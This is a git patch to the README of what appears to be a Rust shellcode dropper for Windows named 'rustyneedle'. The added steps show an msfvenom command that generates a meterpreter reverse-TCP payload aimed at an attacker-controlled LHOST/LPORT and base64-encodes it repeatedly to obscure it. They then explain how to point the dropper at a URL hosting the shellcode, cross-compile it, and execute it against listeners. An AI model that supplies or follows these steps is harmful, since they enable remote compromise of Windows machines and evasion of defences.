From 00bce7e7256fc7198dff1dd4932193eaa20ed8f1 Mon Sep 17 00:00:00 2001 From: Michael Taggart Date: Wed, 6 Apr 2022 17:35:36 -0700 Subject: [PATCH] Add full steps to RM --- README.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/README.md b/README.md index b0ff446..f1d3ad6 100644 --- a/README.md +++ b/README.md @@ -20,3 +20,19 @@ python3 encode.py [SHELLCODE_FILE] [B64_ITERATIONS] [OUT_FILE] * `B64_ITERATIONS`: # of times to base64-encode the shellcode * `OUT_FILE`: Resulting text file of the encoded shellcode. **NOTE:** this will be many times larger than the source! +### Alternative usage + +If you don't want to use the script, you can also encode `0x` hex values from `msfvenom`. It would go something like this: + +```bash +msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f csharp | tail -n+2 | sed 's/[{}; \n]//g' | base64 -w 0 > note.txt +# Pipe to base64 -w 0 as many times as you want to iterate the encoding +``` +3. Edit the source code in `src/main.rs` to reflect the URL where the encoded shellcode will be hosted. + +4. Run `cargo build --target x86_64-pc-windows-gnu --release`. If building on Linux for Windows, make sure you've added the Windows target triple with `rustup target add x86_64-pc-windows-gnu`. + +5. Copy the resulting exe in `target/x86_64-pc-windows-gnu/release/rustyneedle.exe` wherever you like. + +6. Set up any listeners, then execute the dropper! +